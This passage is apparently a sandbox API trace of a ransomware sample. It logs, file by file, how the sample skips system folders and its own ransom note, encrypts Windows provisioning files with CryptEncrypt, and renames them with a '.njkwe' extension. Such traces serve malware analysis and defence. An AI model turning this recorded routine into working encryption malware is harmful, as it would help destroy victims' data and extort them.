lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\31__Connections_Cellular_T-Mobile M2M (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\31__connections_cellular_t-mobile m2m (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.255] GetProcessHeap () returned 0xbe0000 [0078.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.255] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bd19f0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bd19f0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bd19f0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", cAlternateFileName="320__C~1.PRO")) returned 1 [0078.255] lstrcmpiW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.255] lstrcmpiW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.255] lstrcmpiW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.255] lstrcmpiW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.255] lstrcmpiW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.255] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml") returned 171 [0078.255] StrStrIW (lpFirst="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.255] lstrcmpW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.255] lstrcmpW (lpString1="320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.255] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\320__connections_cellular_cable and wireless (panama)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.255] GetTickCount () returned 0x1153e4d [0078.255] GetTickCount () returned 0x1153e4d [0078.255] GetTickCount () returned 0x1153e4d [0078.255] GetTickCount () returned 0x1153e4d [0078.255] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.255] GetProcessHeap () returned 0xbe0000 [0078.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.255] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0078.257] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.257] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0078.257] GetProcessHeap () returned 0xbe0000 [0078.257] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.257] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.257] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.257] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.257] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.257] CloseHandle (hObject=0x43c) returned 1 [0078.258] GetProcessHeap () returned 0xbe0000 [0078.258] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.258] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0078.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\320__connections_cellular_cable and wireless (panama)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\320__Connections_Cellular_Cable and Wireless (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\320__connections_cellular_cable and wireless (panama)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.258] GetProcessHeap () returned 0xbe0000 [0078.258] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.258] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bf7c60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bf7c60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bf7c60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", cAlternateFileName="321__C~1.PRO")) returned 1 [0078.258] lstrcmpiW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.258] lstrcmpiW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.258] lstrcmpiW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.258] lstrcmpiW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.258] lstrcmpiW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.258] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml") returned 158 [0078.259] StrStrIW (lpFirst="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.259] lstrcmpW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.259] lstrcmpW (lpString1="321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.259] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\321__connections_cellular_claro (panama)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.259] GetTickCount () returned 0x1153e4d [0078.259] GetTickCount () returned 0x1153e4d [0078.259] GetTickCount () returned 0x1153e4d [0078.259] GetTickCount () returned 0x1153e4d [0078.260] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.260] GetProcessHeap () returned 0xbe0000 [0078.260] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.260] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0078.261] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.261] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0078.261] GetProcessHeap () returned 0xbe0000 [0078.261] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.261] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.261] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.261] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.261] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.261] CloseHandle (hObject=0x43c) returned 1 [0078.262] GetProcessHeap () returned 0xbe0000 [0078.262] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.262] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0078.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\321__connections_cellular_claro (panama)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\321__Connections_Cellular_Claro (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\321__connections_cellular_claro (panama)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.265] GetProcessHeap () returned 0xbe0000 [0078.265] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.265] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bf7c60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bf7c60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bf7c60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", cAlternateFileName="322__C~1.PRO")) returned 1 [0078.265] lstrcmpiW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.265] lstrcmpiW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.265] lstrcmpiW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.265] lstrcmpiW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.265] lstrcmpiW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.265] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml") returned 163 [0078.265] StrStrIW (lpFirst="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.265] lstrcmpW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.265] lstrcmpW (lpString1="322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.265] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\322__connections_cellular_telefonica (panama)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.265] GetTickCount () returned 0x1153e5d [0078.265] GetTickCount () returned 0x1153e5d [0078.265] GetTickCount () returned 0x1153e5d [0078.265] GetTickCount () returned 0x1153e5d [0078.265] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.266] GetProcessHeap () returned 0xbe0000 [0078.266] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.266] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0078.267] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.267] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0078.267] GetProcessHeap () returned 0xbe0000 [0078.267] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.267] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.267] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.267] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.267] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.268] CloseHandle (hObject=0x43c) returned 1 [0078.268] GetProcessHeap () returned 0xbe0000 [0078.268] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.268] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\322__connections_cellular_telefonica (panama)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\322__Connections_Cellular_Telefonica (Panama)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\322__connections_cellular_telefonica (panama)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.268] GetProcessHeap () returned 0xbe0000 [0078.269] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.269] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bf7c60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bf7c60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bf7c60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", cAlternateFileName="323__C~1.PRO")) returned 1 [0078.269] lstrcmpiW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.269] lstrcmpiW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.269] lstrcmpiW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.269] lstrcmpiW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.269] lstrcmpiW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.269] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml") returned 160 [0078.269] StrStrIW (lpFirst="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.269] lstrcmpW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.269] lstrcmpW (lpString1="323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.269] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\323__connections_cellular_claro (paraguay)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.269] GetTickCount () returned 0x1153e5d [0078.269] GetTickCount () returned 0x1153e5d [0078.269] GetTickCount () returned 0x1153e5d [0078.269] GetTickCount () returned 0x1153e5d [0078.269] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.269] GetProcessHeap () returned 0xbe0000 [0078.270] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.270] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0078.331] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.331] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0078.331] GetProcessHeap () returned 0xbe0000 [0078.331] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.331] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.331] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.331] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, 